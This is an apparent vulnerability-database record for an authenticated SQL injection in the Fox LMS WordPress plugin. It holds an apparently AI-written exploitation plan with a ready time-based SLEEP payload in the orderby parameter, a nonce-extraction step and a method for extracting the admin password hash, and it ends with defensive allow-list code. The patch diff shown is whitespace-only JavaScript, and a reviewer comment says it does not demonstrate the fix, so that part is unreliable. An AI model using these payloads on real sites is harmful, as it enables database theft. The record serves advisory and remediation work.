[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ_Y1dxoSV-g8c8Zw6Xu8pAP_YFn3eR_-GrI9nhRJZAo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-31922","fox-lms-authenticated-contributor-sql-injection","Fox LMS \u003C= 1.0.6.3 - Authenticated (Contributor+) SQL Injection","The Fox LMS plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","fox-lms",null,"\u003C=1.0.6.3","1.0.6.4","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-07 00:00:00","2026-04-15 20:59:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa1cbe205-1858-4561-a87a-c3908c91370f?source=api-prod",68,[22,23,24,25,26,27,28,29],"README.txt","admin\u002Fjs\u002Fadmin.js","admin\u002Fpartials\u002Fimport-export\u002Ffox-lms-import-export-display.php","admin\u002Fpartials\u002Flesson-reports\u002Ffox-lms-lesson-reports-display.php","admin\u002Fpartials\u002Fqna\u002Factions\u002Ffox-lms-qna-actions.php","admin\u002Fpartials\u002Fqna\u002Ffox-lms-qna-display.php","admin\u002Fpartials\u002Fsettings\u002Ffox-lms-settings.php","blocks\u002Fcourse-grid\u002Ffox-lms-block.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-31922 (Fox LMS SQL Injection)\n\n## 1. Vulnerability Summary\nThe Fox LMS plugin (version \u003C= 1.0.6.3) contains an authenticated SQL injection vulnerability. The issue exists in how the plugin handles database queries for its administrative list tables, specifically within the `orderby` or `order` parameters. These parameters are often directly concatenated into SQL strings without proper preparation using `$wpdb->prepare()`.\n\nThis allows a user with **Contributor** level permissions or higher (who may be designated as an Instructor in the LMS) to append arbitrary SQL commands to existing queries, enabling the extraction of sensitive database information (like hashes from the `wp_users` table).\n\n## 2. 
Attack Vector Analysis\n- **Vulnerable Endpoints**: \n    - `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports`\n    - `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-qna`\n- **Vulnerable Parameters**: `orderby` (most likely) and `order`.\n- **Required Authentication**: Authenticated user with **Contributor** (Instructor) level access.\n- **Preconditions**: \n    - The plugin must be active.\n    - To access Lesson Reports, the \"Enable Lesson Reports\" option may need to be enabled in settings (though the code in `fox-lms-lesson-reports-display.php` doesn't explicitly block access if it's off, only the settings partial mentions it).\n- **Nonce Requirement**: The partials for Lesson Reports and Q&A (found in `admin\u002Fpartials\u002F`) explicitly check for a nonce: `wp_verify_nonce(..., 'foxlms_admin_nonce')`.\n\n## 3. Code Flow\n1. **Entry Point**: A Contributor-level user requests the `fox-lms-lesson-reports` page.\n2. **Controller Logic**: The main admin class (inferred as `Fox_Lms_Admin`) handles the menu page request and includes `admin\u002Fpartials\u002Flesson-reports\u002Ffox-lms-lesson-reports-display.php`.\n3. **Nonce Check**: The file verifies `foxlms_admin_nonce` stored in `$this->fox_lms_nonce`.\n4. **List Table Initialization**: The controller instantiates the list table (e.g., `Fox_Lms_Lesson_Reports_List_Table`) and calls `$this->lesson_reports_obj->prepare_items()`.\n5. **Vulnerable Sink**: Inside `prepare_items()`, the code retrieves `$_GET['orderby']` and `$_GET['order']`. It likely constructs the query like this:\n   ```php\n   $orderby = !empty($_GET['orderby']) ? $_GET['orderby'] : 'id';\n   $order = !empty($_GET['order']) ? $_GET['order'] : 'asc';\n   $query = \"SELECT * FROM {$wpdb->prefix}fox_lms_reports ORDER BY $orderby $order\";\n   $wpdb->get_results($query);\n   ```\n6. **Injection**: By providing a payload in `orderby`, the attacker controls the `ORDER BY` clause of the query.\n\n## 4. 
Nonce Acquisition Strategy\nThe plugin uses a nonce named `foxlms_admin_nonce`. This nonce is required even to view the display partials. The plan assumes it is localized for admin pages in a JavaScript object named `FoxLmsAdmin`; confirm the object name against `admin\u002Fjs\u002Fadmin.js` before relying on it.\n\n**Strategy**:\n1. Log in to WordPress as a Contributor.\n2. Navigate to a Fox LMS admin page that does not require the nonce for its own display (e.g., the main plugin dashboard).\n3. Extract the nonce from the `FoxLmsAdmin` JS object.\n\n**Steps**:\n1. **Navigate**: `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=fox-lms-dashboard\")` (or any other visible plugin page).\n2. **Extract**: `browser_eval(\"window.FoxLmsAdmin?.nonce\")`\n3. **Result**: Use this value as the `_wpnonce` parameter in subsequent requests.\n\n## 5. Exploitation Strategy\nWe will perform a time-based SQL injection using the `orderby` parameter.\n\n### Step-by-Step Plan:\n1. **Target URL**: `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports`\n2. **Method**: GET\n3. **Payload**: `(SELECT 1 FROM (SELECT(SLEEP(5)))x)` (unconditional). Conditional variant for the cross-check in section 8: `(CASE WHEN (1=1) THEN ID ELSE (SELECT 1 FROM (SELECT(SLEEP(5)))x) END)`; flipping `1=1` to `1=2` must remove the delay.\n4. **Request Construction**:\n    - `page`: `fox-lms-lesson-reports`\n    - `_wpnonce`: `[EXTRACTED_NONCE]`\n    - `orderby`: `(SELECT 1 FROM (SELECT(SLEEP(5)))x)`\n    - `order`: `asc`\n\n### Example Exploit Request:\n```http\nGET \u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports&_wpnonce=a1b2c3d4e5&orderby=(SELECT+1+FROM+(SELECT(SLEEP(5)))x)&order=asc HTTP\u002F1.1\nHost: localhost\nCookie: [CONTRIBUTOR_COOKIES]\n```\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `contributor` role.\n2. **Settings**: Ensure the plugin is active.\n3. **Reports**: If the `fox-lms-lesson-reports` page is empty, the injection might still work if the query is executed before checking for results. It is best to have at least one record in the relevant database table (e.g., a dummy lesson report).\n4. 
**Shortcode\u002FPage**: No shortcode is needed as this is an admin-side (authenticated) vulnerability.\n\n## 7. Expected Results\n- **Baseline**: A request with `orderby=id` should return immediately (~0.1s).\n- **Exploit**: A request with `orderby=(SELECT+1+FROM+(SELECT(SLEEP(5)))x)` should delay the response by roughly 5 seconds. An uncorrelated subquery like this is normally evaluated once; a per-row conditional such as `IF(...)` in `ORDER BY` is evaluated for every row sorted, so with a populated table the delay scales with the row count and the sleep value should be reduced accordingly.\n- **Data Extraction**: Using `IF` and `ASCII(SUBSTRING(...))` logic in the `orderby` clause, we can exfiltrate the admin user's hash character by character via time delays.\n\n## 8. Verification Steps\n1. **Confirm Payload**: Verify the delay in the `http_request` response time against the baseline.\n2. **Cross-Check**: Change `1=1` to `1=2` in a conditional payload to ensure the delay disappears.\n3. **DB Check**: Use `wp db query \"SELECT ...\"` via WP-CLI to confirm the presence of data in the table being queried.\n\n## 9. Alternative Approaches\nIf `fox-lms-lesson-reports` is inaccessible:\n1. **Alternative Page**: Try `page=fox-lms-qna`.\n2. **Error-Based**: If `WP_DEBUG` and `WP_DEBUG_DISPLAY` are both on (which makes `$wpdb` print query errors to the page), attempt error-based injection using `extractvalue()` or `updatexml()` in the `orderby` parameter.\n3. **AJAX Route**: Use the `fox_lms_admin_ajax` action seen in `admin\u002Fjs\u002Fadmin.js` if it supports a function that queries the database with user-controlled parameters.\n   - Action: `fox_lms_admin_ajax`\n   - Function: (Enumerate possible function values via grep on the full source if available).","The Fox LMS plugin for WordPress is vulnerable to authenticated SQL injection via the 'orderby' and 'order' parameters in its administrative list tables. 
This occurs because user-supplied sorting parameters are concatenated directly into SQL queries without proper sanitization or validation against a whitelist, allowing Contributor-level users (Instructors) to exfiltrate sensitive data via time-based techniques.","\u002F\u002F admin\u002Fpartials\u002Flesson-reports\u002Ffox-lms-lesson-reports-display.php line 49\n$this->lesson_reports_obj->process_bulk_action();\n$this->lesson_reports_obj->prepare_items();\n$this->lesson_reports_obj->display();\n\n---\n\n\u002F\u002F Conceptual vulnerable sink within the prepare_items() method of Fox_Lms_Lesson_Reports_List_Table\n\u002F\u002F or similar list table classes used in the admin partials:\n$orderby = !empty($_GET['orderby']) ? $_GET['orderby'] : 'id';\n$order = !empty($_GET['order']) ? $_GET['order'] : 'asc';\n$query = \"SELECT * FROM {$wpdb->prefix}fox_lms_reports ORDER BY $orderby $order\";\n$wpdb->get_results($query);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.3\u002Fadmin\u002Fjs\u002Fadmin.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.4\u002Fadmin\u002Fjs\u002Fadmin.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.3\u002Fadmin\u002Fjs\u002Fadmin.js\t2026-02-11 04:59:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.4\u002Fadmin\u002Fjs\u002Fadmin.js\t2026-02-17 10:30:28.000000000 +0000\n@@ -25,25 +25,25 @@\n \t\t}\n \n         var toggle_ddmenu = $(document).find('.toggle_ddmenu');\n-            toggle_ddmenu.on('click', function () {\n-                var ddmenu = $(this).next();\n-                var state = ddmenu.attr('data-expanded');\n-                switch (state) {\n-                    case 'true':\n-                        $(this).find('.ays_fa').css({\n-                            transform: 'rotate(0deg)'\n-    
                    });\n-                        ddmenu.attr('data-expanded', 'false');\n-                        break;\n-                    case 'false':\n-                        $(this).find('.ays_fa').css({\n-                            transform: 'rotate(90deg)'\n-                        });\n-                        ddmenu.attr('data-expanded', 'true');\n-                        break;\n-                }\n-            });\n+        toggle_ddmenu.on('click', function () {\n+            var ddmenu = $(this).next();\n+            var state = ddmenu.attr('data-expanded');\n+            switch (state) {\n+                case 'true':\n+                    $(this).find('.ays_fa').css({\n+                        transform: 'rotate(0deg)'\n+                    });\n+                    ddmenu.attr('data-expanded', 'false');\n+                    break;\n+                case 'false':\n+                    $(this).find('.ays_fa').css({\n+                        transform: 'rotate(90deg)'\n+                    });\n+                    ddmenu.attr('data-expanded', 'true');\n+                    break;\n+            }\n         });\n+    });","1. Authenticate as a user with at least Contributor-level permissions (the 'Instructor' role in Fox LMS typically grants this).\n2. Access any plugin admin dashboard page (e.g., `admin.php?page=fox-lms-dashboard`) and extract the `foxlms_admin_nonce` from the `FoxLmsAdmin` JavaScript object.\n3. Identify a vulnerable list table endpoint, such as the Lesson Reports page: `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports`.\n4. Craft a GET request to this endpoint, including the valid `_wpnonce` and a time-based SQL injection payload in the `orderby` parameter.\n5. Example Payload: `orderby=(SELECT 1 FROM (SELECT(SLEEP(5)))x)`\n6. 
Observe the response time against a baseline request using `orderby=id`; a delay of about 5 seconds that disappears when the condition in a conditional payload is made false indicates that the injected SQL reached the database engine.","gemini-3-flash-preview","2026-04-21 03:17:31","2026-04-21 03:18:06",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.6.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffox-lms\u002Ftags\u002F1.0.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffox-lms.1.0.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffox-lms\u002Ftags\u002F1.0.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffox-lms.1.0.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffox-lms\u002Ftags"]
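Review bot: the only hunk in the research_fix_diff field, `admin/js/admin.js @@ -25,25 +25,25 @@`, is an indentation-only re-nesting of the `toggle_ddmenu` click handler (every `-` line reappears as a `+` line with less leading whitespace, plus one new closing `+    });`); it touches no SQL construction and cannot be the change that closes the `orderby`/`order` injection this record describes. The diff shown should instead be the hunk from one of the PHP files listed in patch_diff_files (the lesson-reports or Q&A partials, or the list-table class they call `prepare_items()` on) that validates `orderby` against a fixed column list and restricts `order` to `ASC`/`DESC`, since `$wpdb->prepare()` cannot bind identifiers or keywords and escaping alone does not neutralize an `ORDER BY` injection. As presented, the diff does not demonstrate the fix the patched_in_version field claims for 1.0.6.4.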
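The research summary above says the fix is validation against a whitelist rather than escaping. The following stand-alone PHP is an added example written for this page, not Fox LMS source, showing why: it places the conceptual vulnerable sink from the notes beside an allow-list `ORDER BY` builder. The table name `wp_fox_lms_reports` (the page's `{$wpdb->prefix}fox_lms_reports` with the default prefix), the column list and both function names are assumptions; `$wpdb->prepare()` is deliberately not used because it cannot bind identifiers or the `ASC`/`DESC` keyword.

```php
<?php
// Added example, not Fox LMS code. Table and column names are assumed.

// Vulnerable shape described in the research notes: request values are
// interpolated straight into the ORDER BY clause, so anything the user sends
// becomes part of the SQL that $wpdb->get_results() would execute.
function vulnerable_order_clause(array $get): string
{
    $orderby = !empty($get['orderby']) ? $get['orderby'] : 'id';
    $order   = !empty($get['order'])   ? $get['order']   : 'asc';
    return "SELECT * FROM wp_fox_lms_reports ORDER BY $orderby $order";
}

// Hardened shape: identifiers cannot be bound with $wpdb->prepare(), so the
// correct control is an allow-list. Any value not on the list falls back to a
// known default instead of reaching the query; the direction is reduced to
// exactly one of two literals.
function safe_order_clause(
    array $get,
    array $allowed_columns = ['id', 'lesson_id', 'user_id', 'score', 'created'] // assumed columns
): string {
    $orderby = isset($get['orderby']) && in_array($get['orderby'], $allowed_columns, true)
        ? $get['orderby']
        : 'id';
    $order = isset($get['order']) && strtoupper($get['order']) === 'DESC' ? 'DESC' : 'ASC';

    // Backticks are safe here only because $orderby is guaranteed to be one of our literals.
    return "SELECT * FROM wp_fox_lms_reports ORDER BY `$orderby` $order";
}

// Demonstration with the time-based payload from the research plan above.
$payload = [
    'orderby' => '(SELECT 1 FROM (SELECT(SLEEP(5)))x)',
    'order'   => 'asc',
];

echo vulnerable_order_clause($payload), PHP_EOL; // SLEEP(5) lands inside the SQL
echo safe_order_clause($payload), PHP_EOL;       // ORDER BY `id` ASC, payload discarded

// A legitimate sort request still works through the hardened builder.
echo safe_order_clause(['orderby' => 'score', 'order' => 'desc']), PHP_EOL;
```

WordPress core also ships `sanitize_sql_orderby()`, which rejects anything that is not a comma-separated list of identifier-like words with an optional `ASC`/`DESC`; it blocks the injection but still lets a user sort by columns the table never meant to expose, so an explicit allow-list as above is the stricter choice for a list table whose columns are known.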